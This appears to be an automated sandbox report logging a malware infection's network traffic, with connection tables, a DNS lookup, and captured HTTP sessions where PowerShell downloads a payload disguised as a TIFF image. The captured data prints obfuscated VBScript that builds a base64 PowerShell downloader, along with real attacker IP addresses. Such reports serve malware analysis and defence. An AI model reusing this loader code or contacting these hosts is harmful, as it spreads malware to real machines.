                                                                                                                    Nov 15, 2024 18:15:53.951385975 CET5004780192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:53.956245899 CET805004794.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:54.916069031 CET805004794.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:54.916539907 CET5004780192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:54.922369003 CET805004794.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:54.922529936 CET5004780192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:55.065984964 CET5004880192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:55.070954084 CET805004894.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:55.071028948 CET5004880192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:55.073044062 CET5004880192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:55.077860117 CET805004894.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:55.077914000 CET5004880192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:55.082861900 CET805004894.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:56.055499077 CET805004894.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:56.055649042 CET5004880192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:56.061021090 CET805004894.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:56.061105967 CET5004880192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:56.194719076 CET5004980192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:56.199596882 CET805004994.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:56.199687958 CET5004980192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:56.201775074 CET5004980192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:56.206700087 CET805004994.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:56.206763029 CET5004980192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:56.211594105 CET805004994.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:57.189745903 CET805004994.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:57.189915895 CET5004980192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:57.195280075 CET805004994.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:57.195503950 CET5004980192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:57.340611935 CET5005080192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:57.345591068 CET805005094.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:57.345830917 CET5005080192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:57.347786903 CET5005080192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:57.353445053 CET805005094.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:57.353616953 CET5005080192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:57.358592987 CET805005094.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:58.301390886 CET805005094.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:58.301640034 CET5005080192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:58.307065964 CET805005094.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:58.307152033 CET5005080192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:58.458792925 CET5005180192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:58.463711023 CET805005194.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:58.463829041 CET5005180192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:58.465945005 CET5005180192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:58.470830917 CET805005194.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:58.470890999 CET5005180192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:58.475712061 CET805005194.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:59.439821959 CET805005194.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:59.440010071 CET5005180192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:59.445467949 CET805005194.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:59.445542097 CET5005180192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:59.589395046 CET5005280192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:59.594273090 CET805005294.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:59.594382048 CET5005280192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:59.596467018 CET5005280192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:59.601341963 CET805005294.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:15:59.601398945 CET5005280192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:15:59.606509924 CET805005294.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:00.576663971 CET805005294.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:00.576895952 CET5005280192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:00.581983089 CET805005294.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:00.582056046 CET5005280192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:00.716341019 CET5005380192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:00.721262932 CET805005394.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:00.721338987 CET5005380192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:00.723691940 CET5005380192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:00.728557110 CET805005394.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:00.728619099 CET5005380192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:00.733477116 CET805005394.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:01.676630020 CET805005394.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:01.676780939 CET5005380192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:01.682183027 CET805005394.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:01.682255030 CET5005380192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:01.821651936 CET5005480192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:01.826844931 CET805005494.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:01.826922894 CET5005480192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:01.829083920 CET5005480192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:01.834808111 CET805005494.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:01.834857941 CET5005480192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:01.839648962 CET805005494.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:02.802675962 CET805005494.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:02.815850019 CET5005480192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:02.821049929 CET805005494.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:02.821135044 CET5005480192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:03.152708054 CET5005580192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:03.157660961 CET805005594.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:03.157768011 CET5005580192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:03.160758018 CET5005580192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:03.165570021 CET805005594.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:03.165663004 CET5005580192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:03.170471907 CET805005594.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:04.169306993 CET805005594.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:04.169498920 CET5005580192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:04.174978018 CET805005594.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:04.175077915 CET5005580192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:04.322495937 CET5005680192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:04.330107927 CET805005694.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:04.330195904 CET5005680192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:04.332446098 CET5005680192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:04.337307930 CET805005694.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:04.337363958 CET5005680192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:04.346070051 CET805005694.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:05.363466024 CET805005694.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:05.363656044 CET5005680192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:05.368968964 CET805005694.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:05.369039059 CET5005680192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:05.511528969 CET5005780192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:05.516443968 CET805005794.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:05.516511917 CET5005780192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:05.830832958 CET5005780192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:05.835798025 CET805005794.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:05.839273930 CET5005780192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:05.844158888 CET805005794.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:06.516520977 CET805005794.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:06.517735004 CET5005780192.168.2.594.156.177.95
                                                                                                                    Nov 15, 2024 18:16:06.523288012 CET805005794.156.177.95192.168.2.5
                                                                                                                    Nov 15, 2024 18:16:06.524100065 CET5005780192.168.2.594.156.177.95
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Nov 15, 2024 18:14:13.835386038 CET5265453192.168.2.51.1.1.1
                                                                                                                    Nov 15, 2024 18:14:13.850066900 CET53526541.1.1.1192.168.2.5
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Nov 15, 2024 18:14:13.835386038 CET192.168.2.51.1.1.10xf64bStandard query (0)1017.filemail.comA (IP address)IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Nov 15, 2024 18:14:13.850066900 CET1.1.1.1192.168.2.50xf64bNo error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 15, 2024 18:14:13.850066900 CET1.1.1.1192.168.2.50xf64bNo error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false
                                                                                                                    • 1017.filemail.com
                                                                                                                    • 192.3.243.136
                                                                                                                    • 94.156.177.95
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.549704192.3.243.136803160C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:08.233702898 CET329OUTGET /32/seemybestthingswithentirelifetimethingstodomybest.tIF HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                    Host: 192.3.243.136
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Nov 15, 2024 18:14:08.904371023 CET1236INHTTP/1.1 200 OK
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:08 GMT
                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                    Last-Modified: Fri, 15 Nov 2024 07:20:09 GMT
                                                                                                                    ETag: "22a26-626ee659e8109"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Content-Length: 141862
                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: image/tiff
                                                                                                                    Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 64 00 65 00 73 00 65 00 6d 00 70 00 65 00 6e 00 6f 00 28 00 42 00 79 00 56 00 61 00 6c 00 20 00 63 00 61 00 72 00 72 00 61 00 6d 00 65 00 6c 00 6f 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 73 00 6f 00 6d 00 62 00 72 00 6f 00 73 00 6f 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 70 00 6f 00 72 00 71 00 75 00 65 00 74 00 65 00 73 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 69 00 6d 00 20 00 61 00 66 00 61 00 6d 00 61 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 61 00 66 00 61 00 6d 00 61 00 72 00 20 00 3d 00 20 00 49 00 6e 00 53 00 74 00 72 00 28 00 63 00 61 00 72 00 72 00 61 00 6d 00 65 00 6c 00 6f 00 2c 00 20 00 73 00 6f 00 6d 00 62 00 72 00 6f 00 73 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 6f 00 20 00 57 00 68 00 69 00 6c 00 65 00 20 00 61 00 66 00 61 00 6d 00 61 00 72 00 20 00 3e 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 [TRUNCATED]
                                                                                                                    Data Ascii: Function desempeno(ByVal carramelo, ByVal sombroso, ByVal porquetes) Dim afamar afamar = InStr(carramelo, sombroso) Do While afamar > 0 carramelo = Left(carramelo, afamar - 1) & porquetes & Mid(carramelo, afamar + Len(sombroso)) afamar = InStr(afamar + Len(porquetes), carramelo, sombroso) Loop desempeno = carrameloEnd Functionprivate function ReadStdIn() while Not stdIn.AtEndOfStream
                                                                                                                    Nov 15, 2024 18:14:08.904465914 CET1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 52 00 65 00 61 00 64 00 53 00 74 00 64 00 49 00 6e 00 20 00 3d 00 20 00 52 00 65 00 61 00 64 00 53 00 74 00 64 00 49 00 6e 00 20 00 26 00 20 00 73 00 74 00 64 00 49 00 6e 00 2e 00 52 00 65 00 61
                                                                                                                    Data Ascii: ReadStdIn = ReadStdIn & stdIn.ReadAll wendend functionIf Not rhinocephalia() Then
                                                                                                                    Nov 15, 2024 18:14:08.904547930 CET1236INData Raw: 00 4d 00 44 00 6b 00 77 00 4e 00 47 00 59 00 67 00 62 00 31 00 52 00 42 00 4f 00 79 00 63 00 72 00 4a 00 33 00 42 00 33 00 5a 00 33 00 64 00 6c 00 59 00 6b 00 4e 00 73 00 61 00 57 00 56 00 75 00 64 00 4d 00 57 00 4b 00 4e 00 41 00 5a 00 43 00 47
                                                                                                                    Data Ascii: MDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudMWKNAZCGSPYFLJOCA9IE5ldy1PYmplY3QgU3lzdGVtLMWKNAZCGSPYFLJOk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2V
                                                                                                                    Nov 15, 2024 18:14:08.904683113 CET1236INData Raw: 00 68 00 5a 00 79 00 6b 00 37 00 63 00 48 00 64 00 6e 00 4a 00 79 00 73 00 6e 00 63 00 33 00 52 00 68 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 62 00 72 00 65 00 6a 00 61 00 6c 00 20 00 3d 00 20 00 62 00 72 00 65 00 6a
                                                                                                                    Data Ascii: hZyk7cHdnJysnc3Rh" brejal = brejal & "cnRJbMWKNAZCGSPYFLJOmRlMWKNAZCGSPYFLJOeCAtZ2UgMCAtYW5kMWKNAZCGSPYFLJOIHB3Z
                                                                                                                    Nov 15, 2024 18:14:08.904761076 CET848INData Raw: 00 6e 00 58 00 79 00 42 00 39 00 4b 00 56 00 73 00 74 00 4d 00 53 00 34 00 75 00 4c 00 53 00 68 00 77 00 64 00 32 00 64 00 69 00 59 00 58 00 4e 00 6c 00 4e 00 6a 00 52 00 44 00 62 00 32 00 31 00 74 00 59 00 57 00 35 00 6b 00 4c 00 6b 00 78 00 6c
                                                                                                                    Data Ascii: nXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJp
                                                                                                                    Nov 15, 2024 18:14:08.904864073 CET1236INData Raw: 00 46 00 4a 00 62 00 31 00 52 00 42 00 4b 00 54 00 74 00 77 00 64 00 32 00 64 00 32 00 59 00 57 00 6b 00 6e 00 4b 00 79 00 64 00 4e 00 5a 00 58 00 52 00 6f 00 62 00 32 00 51 00 75 00 53 00 57 00 35 00 32 00 62 00 32 00 74 00 6c 00 4b 00 48 00 42
                                                                                                                    Data Ascii: FJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMu" brejal = brejal
                                                                                                                    Nov 15, 2024 18:14:08.904913902 CET212INData Raw: 00 47 00 53 00 50 00 59 00 46 00 4c 00 4a 00 4f 00 32 00 46 00 30 00 61 00 58 00 5a 00 68 00 5a 00 47 00 39 00 76 00 56 00 45 00 45 00 70 00 4b 00 54 00 73 00 6e 00 4b 00 53 00 35 00 53 00 5a 00 58 00 42 00 4d 00 51 00 4d 00 57 00 4b 00 4e 00 41
                                                                                                                    Data Ascii: GSPYFLJO2F0aXZhZG9vVEEpKTsnKS5SZXBMQMWKNAZCGSPYFLJOWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFy
                                                                                                                    Nov 15, 2024 18:14:08.904990911 CET1236INData Raw: 00 58 00 54 00 45 00 78 00 4d 00 53 00 74 00 62 00 51 00 32 00 68 00 42 00 63 00 6c 00 30 00 34 00 4e 00 43 00 74 00 62 00 51 00 32 00 68 00 42 00 63 00 6c 00 30 00 32 00 4e 00 53 00 6b 00 73 00 57 00 31 00 4e 00 55 00 63 00 6b 00 6c 00 75 00 5a
                                                                                                                    Data Ascii: XTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk="
                                                                                                                    Nov 15, 2024 18:14:08.905059099 CET212INData Raw: 00 4f 00 24 00 4f 00 4d 00 57 00 4b 00 4e 00 41 00 5a 00 43 00 47 00 53 00 50 00 59 00 46 00 4c 00 4a 00 4f 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 72 00 6f 00 6e 00 69 00 71 00 75 00 69 00 7a 00 61 00 72 00 20
                                                                                                                    Data Ascii: O$OMWKNAZCGSPYFLJO" croniquizar = croniquizar & "WMWKNAZCGSPYFLJOj" croniquizar = croniq
                                                                                                                    Nov 15, 2024 18:14:08.905271053 CET1236INData Raw: 00 75 00 69 00 7a 00 61 00 72 00 20 00 26 00 20 00 22 00 4d 00 57 00 4b 00 4e 00 41 00 5a 00 43 00 47 00 53 00 50 00 59 00 46 00 4c 00 4a 00 4f 00 75 00 78 00 4d 00 57 00 4b 00 4e 00 41 00 5a 00 43 00 47 00 53 00 50 00 59 00 46 00 4c 00 4a 00 4f
                                                                                                                    Data Ascii: uizar & "MWKNAZCGSPYFLJOuxMWKNAZCGSPYFLJOd " croniquizar = croniquizar & "=MWKNAZCGSPYFLJO [syMWKNAZCGSPYFLJOs"
                                                                                                                    Nov 15, 2024 18:14:08.909419060 CET1236INData Raw: 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 72 00 6f 00 6e 00 69 00 71 00 75 00 69 00 7a 00 61 00 72 00 20 00 3d 00 20 00 63 00 72 00 6f 00 6e 00 69 00 71 00 75 00 69 00 7a 00 61 00 72 00 20 00 26 00 20 00 22 00 46 00 38 00 4d
                                                                                                                    Data Ascii: croniquizar = croniquizar & "F8MWKNAZCGSPYFLJO." croniquizar = croniquizar & "GeMWKNAZCGSPYFLJOt"


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.549748192.3.243.136805536C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:28.735898972 CET76OUTGET /32/SMPLLS.txt HTTP/1.1
                                                                                                                    Host: 192.3.243.136
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Nov 15, 2024 18:14:29.780296087 CET1236INHTTP/1.1 200 OK
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:29 GMT
                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                    Last-Modified: Fri, 15 Nov 2024 07:15:11 GMT
                                                                                                                    ETag: "22aac-626ee53dbb4e2"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Content-Length: 141996
                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: text/plain
                                                                                                                    Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                                    Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    Nov 15, 2024 18:14:29.780373096 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    Nov 15, 2024 18:14:29.780422926 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    Nov 15, 2024 18:14:29.780472040 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    Nov 15, 2024 18:14:29.780519962 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
